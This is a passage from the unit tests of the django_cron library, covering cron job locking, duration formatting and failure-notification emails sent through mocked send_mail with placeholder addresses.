# this second run shouldn't execute, since the first job still holds the lock
sleep(0.1) # to avoid race condition
call(self.wait_3sec_cron)
t.join(10)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
# TODO: this test doesn't pass - it seems the second cron job locks the file itself,
# whereas it should raise an exception because the file is already locked by the other cron job
# @override_settings(
# DJANGO_CRON_LOCK_BACKEND='django_cron.backends.lock.file.FileLock',
# DJANGO_CRON_LOCKFILE_PATH=os.path.join(os.getcwd())
# )
# def test_file_locking_backend_in_thread(self):
# """
# with file locking backend
# """
# logs_count = CronJobLog.objects.all().count()
# t = threading.Thread(target=self.run_cronjob_in_thread, args=(logs_count,))
# t.daemon = True
# t.start()
# # this shouldn't get running
# sleep(1) # to avoid race condition
# call(self.wait_3sec_cron)
# t.join(10)
# self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_humanize_duration(self):
test_subjects = (
(timedelta(days=1, hours=1, minutes=1, seconds=1), '1 day, 1 hour, 1 minute, 1 second'),
(timedelta(days=2), '2 days'),
(timedelta(days=15, minutes=4), '15 days, 4 minutes'),
(timedelta(), '< 1 second'),
)
for duration, humanized in test_subjects:
self.assertEqual(
humanize_duration(duration),
humanized
)
class FailureReportTests(DjangoCronTestCase):
"""
Unit tests for the FailedRunsNotificationCronJob.
"""
def _error_cron(self):
call(self.error_cron, force=True)
def _report_cron(self):
call(self.test_failed_runs_notification_cron, force=True)
def _error_and_report(self):
self._error_cron()
self._report_cron()
def _resolve_reported_failures(self, cron_cls, failed_jobs):
"""
Resolve the failed jobs passed to the notifier's report_failure().
This allows us to assert which jobs were passed, given that failed_jobs is a
queryset which shouldn't match any instances after the notifier runs,
as it should mark all log entries as having been reported.
"""
self.reported_cls = cron_cls
self.reported_jobs = set(failed_jobs)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
def test_failed_notifications(self, mock_report):
"""
By default, the user should be notified after 10 job failures.
"""
mock_report.side_effect = self._resolve_reported_failures
for _ in range(9):
self._error_and_report()
self.assertEquals(0, mock_report.call_count)
# The tenth error triggers the report
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
# The correct job class and entries should be included
self.assertEquals(test_crons.TestErrorCronJob, self.reported_cls)
error_logs = CronJobLog.objects.filter(
code=test_crons.TestErrorCronJob.code
)
self.assertEquals(set(error_logs), self.reported_jobs)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_settings_can_override_number_of_failures(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_logs_all_unreported(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_cron()
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
self.assertEqual(2, len(self.reported_jobs))
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_only_logs_failures(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
call(self.success_cron, force=True)
self._error_and_report()
self.assertEqual(
self.reported_jobs,
{CronJobLog.objects.get(code=test_crons.TestErrorCronJob.code)}
)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_only_reported_once(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
# Calling the notifier for a second time doesn't report a second time
self._report_cron()
self.assertEqual(1, mock_report.call_count)
@patch('django_cron.cron.send_mail')
@override_settings(
CRON_MIN_NUM_FAILURES=1,
CRON_FAILURE_FROM_EMAIL='from@email.com',
CRON_FAILURE_EMAIL_RECIPIENTS=['foo@bar.com', 'x@y.com'],
FAILED_RUNS_CRONJOB_EMAIL_PREFIX='ERROR!!!'
)
def test_uses_send_mail(self, mock_send_mail):
"""
Test that django_common is used to send the email notifications.
"""
self._error_and_report()
self.assertEquals(1, mock_send_mail.call_count)
kwargs = mock_send_mail.call_args[1]
self.assertIn('ERROR!!!', kwargs['subject'])
self.assertEquals('from@email.com', kwargs['from_email'])
self.assertEquals(
['foo@bar.com', 'x@y.com'], kwargs['recipient_emails']
)
|